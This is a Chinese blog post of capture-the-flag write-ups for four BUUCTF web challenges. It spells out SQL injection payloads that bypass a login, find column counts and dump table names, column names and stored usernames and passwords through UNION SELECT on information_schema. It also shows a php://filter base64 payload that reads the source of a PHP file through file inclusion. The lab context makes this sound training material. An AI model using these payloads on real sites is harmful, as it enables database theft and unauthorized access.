buuctf web wp

最新推荐文章于 2022-11-05 12:33:10 发布
最新推荐文章于 2022-11-05 12:33:10 发布
阅读量434 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63267612/article/details/123975352
版权

文章目录

[极客大挑战 2019]EasySQL

打开后是一个登录框,直接尝试万能密码

(用户名:1’ or 1=1 # 密码:随便输)

登录得到flag
在这里插入图片描述
这里的万能密码是为什么呢?
数据库中的查询语句:

select id from users where username = '' or 1=1--  and password = '456'

又 这里呢1=1永远为真,后面 and password = ‘456’被注释掉了。数据库不需要考虑,这里我们就跳过了验证。
绕圈子的写法
尝试输入用户名和密码,在用户名和密码处输入正常数字时显示NO,Wrong username password!!! 但是在用户名和密码处输入数字加上’时页面报错,尝试换成数字+)没有报错,所以判断存在sql注入并且闭合符号为’

接着查询字段数

http://0c01d356-491f-4f75-be44-ec8e20c6661c.node4.buuoj.cn:81/check.php?``username=1' order by 4%23&password=1

查询注入点

http://0c01d356-491f-4f75-be44-ec8e20c6661c.node4.buuoj.cn:81/check.php?username=1' union select 1,2,3%23&password=1

这时已经爆出了flag
在这里插入图片描述

[极客大挑战 2019]Havefun

打开后一个挺好玩的网站,查看源代码,拉到底发现是一个简单的get传值,
在这里插入图片描述
直接输入?cat=dog可以得到flag

[极客大挑战 2019]Secret File

是个网站,先查看源代码,发现有一个可以点的网站,点开进入
在这里插入图片描述
按钮点了之后会迅速返回到这里
在这里插入图片描述
尝试抓包,看看有没有有用的信息,抓包发现有一个文件,访问
在这里插入图片描述
访问后又发现一个提示
在这里插入图片描述
访问flag.php发现什么也没有,这里思路断了不知道咋那么写了,查看别人的wp发现要用到filter伪协议没见过,去百度搜了下,这里用到的是base过滤器:
base64的编码转换操作,例如:

file_get_contents("php://filter/read=convert.base64-encode/resource=data://text/plain,m1sn0w");

Quoted-printable可译为可打印字符引用编码,可以理解为将一些不可打印的ASCII字符进行一个编码转换,转换成=后面跟两个十六进制数,例如:

file_get_contents("php://filter/read=convert.quoted-printable-encode/resource=data://text/plain,m1sn0w".chr(12));
 输出为m1sn0w=0C

摘自大佬博客:https://cxymm.net/article/gental_z/122303393
所以这里要构造语句

?file=php://filter/convert.base64-encode/resource=flag.php

可以得到一长串base密码,找个网站解密可以得到flag
在这里插入图片描述

[极客大挑战 2019]LoveSQL

打开后发现是一个登录框,尝试万能密码
可以得到这个
在这里插入图片描述
尝试登陆,果然登不上
那就sql注入,查询字符段

?username=1' order by 3%23&passward=1

?username=1' order by 4%23&passward=1

4时报错,字段数为3
然后查询注入点

?username=1' union select 1,2,3%23&password=1

在这里插入图片描述
得到回显点位为2和3,查询当前数据库名及版本:

?username=1' union select 1,database(),version()%23&password=1

在这里插入图片描述
然后爆表

?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

在这里插入图片描述
爆字段,先爆l0ve1ysq1这个表

?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

在这里插入图片描述
最后爆数据,得到flag

?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

在这里插入图片描述

Lyyhun
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目WP,其中也有别人的WP
CtfHub-wpweb
最新发布
01-23
ctfhub平台webwp
BUUCTF admin
biggerpig的博客
09-24 865
buuctfweb类型admin题目
Buuctf Http
Dexret的博客
12-07 2250
打开该靶机,发现该靶机为一个普通的页面 查看一下该网页的源码 发现有一个Secret.php的网页,打开该网页 这里提示我们需要从https://Sycsecret.buuoj.cn去访问该网页 利用Burpsuite对该网页进行抓包,添加referer值 Referer:https://Sycsecret.buuoj.cn 添加完referer值后发现,又需要我们通过Syclover浏览器去访问该网页 修改User-Agent值 User-Agent:Syclover ..
[SUCTF 2018]GetShell 中文字符取反绕过
scrawman的博客
12-06 4989
[SUCTF 2018]GetShell for i in range (33,126): print("<?php"+chr(i)) 因为不知道黑名单,先写一个fuzz词典,因为是从第五个字符开始匹配,所以前面填充<?php 能用的字符只有{}[]_$~ 看样子又是无字母数字shell,异或被过滤那就用取反,以下脚本通过汉字字符取反得到英文字符。感谢这位老哥的文章https://xz.aliyun.com/t/8107#toc-6 <?php header("Content-t
SpringBoot第四篇:连接H2数据查询数据报:Wrong username or password 或者Table "USER" not found
专注分享个人所得,希望给大家带来帮助
03-11 4662
在上一篇编写如何连接H2数据库查询数据的时候,出现了好些关于H2数据库的问题。现在一一提供我的解决方案。 1.创建H2数据库时,提示:org.h2.jdbc.JdbcSQLException:Afilepaththatisimplicitlyrelativetothecurrentworkingdirectoryisnotallowedinthedatabas...
buuctf 刷题5(sql注入篇)
weixin_63231007的博客
05-10 3927
sql注入挺难的我感觉,但是很重要,有好多绕过,和注入手段需要一步步在尝试,因此本章刷一下buuctf各个sql注入题目,来巩固联系一下自己在sql注入方面的知识。 [极客大挑战 2019]HardSQL 1 输入1',出错,1'#显示不同,存在单引号闭合注入。 order by查字段,union,堆叠注入,和输入数字都烦返回错误 =,空格,和好多关键字都被过滤了。 空格用()绕过,=用like绕过。 尝试报错注入: 1'or(updatexml(1,concat...
wpWeb服务编程案例
04-03
wpWeb服务编程案例源码,移动设备现在紧密的跟互联网结合,开发者应该利用这个优势来开发各种网络服务,今天我们介绍在 Windows Phone 上开发 Web 服务应用。
封面应用WP7
04-02
这是封面应用WP7源码,也是Windows Phone 7封面应的一个实例,可以实现项目演示影片效果,和一些书籍等封面效果,该界面不但可以实现左右滚动,而且效果很不错,喜欢wp开发的朋友可以下载学习一下。
web-wp-API
02-21
Adonis API应用程序 这是在AdonisJs中创建API服务器的样板,它已预先配置。 人体分析仪 验证 CORS 清醒的ORM 迁移与种子 设置 使用adonis命令安装蓝图 adonis new yardstick --api-only 或手动克隆存储库,然后...
BUUCTF之MISC(持续更新)
12-21
写在前面:这两天初接触ctf。先从最简单的杂项做起。之前看了杂项的教程也听了课,基本没怎么看答案。于是出现了好多问题,边做题边解决问题。。虽然这样对于深入学习不太好但是对于特别懒的我还挺喜欢这样的- -有几次真的心态崩溃。写一个记录贴。kali真的是个好东西。。 解决了的问题: kali忘了密码怎么办 kali的vmroots兼容性问题与如何更新源 php的基础语法 wenhex的使用方法 kali的基本工具了解 签到题 睡醒后做的第一个签到题,我可能脑子还在梦里,没有看见那么大的一个flag。 金三胖(帧隐藏问题) 一个gif图片 用stdeslove打开后用FB帧浏览器分离帧。最开始分离
BUUCTF Misc wp大合集(1)
Ivyyyyyy1的博客
07-03 2098
BUUCTF Misc 杂项方向write up合集(一),持续更新中
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7045
BUUCTF题目Misc部分wp(持续更新)
BUUCTF web第一页WP
东隅的博客
05-13 727
目录 [极客大挑战 2019]EasySQL [HCTF 2018]WarmUp [极客大挑战 2019]Havefun [ACTF2020 新生赛]Include [强网杯 2019]随便注 [极客大挑战 2019]EasySQL payload: 1' or 1=1-- - 1 flag{deb9ccf8-479a-49c9-8412-6171f1c4b057} [HCTF 2018]WarmUp f12查看源码发现提示source.php, 进入获得源代码 .
BUUCTF web admin (flask_session问题)
H4ppyD0g的博客
02-23 1366
检查源码,发现有注释<!-- you are not admin -->,应该是提示用admin账号登录。 两个功能,注册和登录,想到之前做过一个注册admin加空格的题,试了一下不成功。 然后老老实实注册一个普通用户 显示了自己的用户名,我们的目的因该是让自己的用户名变成admin才行。 change password只能修改自己账号的密码,没有漏洞。 post可能有xss漏洞,交...
BUUCTF-部分WebWP
lqyzkn的博客
10-04 725
[HCTF 2018]WarmUp PHP 代码审计 WP: 拿到题目查看源码,发现一个文件 打开后得到如下源码: 按照提示访问hint.php文件,得到提示: 猜想flag在ffffllllaaaagggg文件里,然后进行php代码审计,发现flag可能包含在file文件夹里了,经过多次尝试目录穿越,得到flag: 当然,这里用hint.php也行。 [极客大挑战 2019]Havefun WP: 打开网址查看源码: 看见一段被注释掉的PHP代码。代码提示,如果请求page?cat=xxx,在
buuctfweb刷题wp详解及知识整理----[安洵杯 2019]easy_web
weixin_45784586的博客
06-21 712
尝试之路加wp 观察源代码和get所传参数可猜测img所传参数img就是该图片 经过两次base64编码和一次hex编码后可得555.png成果验证猜测 然后发现该图片以data元数据封装的方式放到了源码里 猜测可以通过此漏过获得index.php的源码 于是将img处参数设为经过两次base64编码和一次hex编码后的index.php 成功获得index.php源代码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-typ
BUUCTF web WarmUp
A_dmin的博客
06-07 1万+
BUUCTF web WarmUp 一天一道CTF题目,能多不能少 打开页面,一个滑稽,查看源码,得到source.php,输入得到源码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { ...
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 2万+
buuctf题目的部分writeup,持续更新中
buuctf reverse wp
08-03
根据提供的引用内容,我们可以得到以下信息: 引用[1]提供了一个大整数n,以及它的因子p和q。 引用[2]提供了一个函数get_flag(),其中包含了一些逻辑判断和字符串操作。根据代码中的注释,当随机数为1时,会输出一个flag。 引用[3]提供了一个main函数,其中包含了一些字符串比较和逻辑判断。根据代码中的注释,当输入的字符串满足一定条件时,会输出"You are correct!"。 根据以上信息,我们可以推断buuctf reverse wp是关于逆向工程的挑战。具体来说,可能需要分析get_flag()函数和main函数的逻辑,以及对n进行因式分解,以获取flag。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值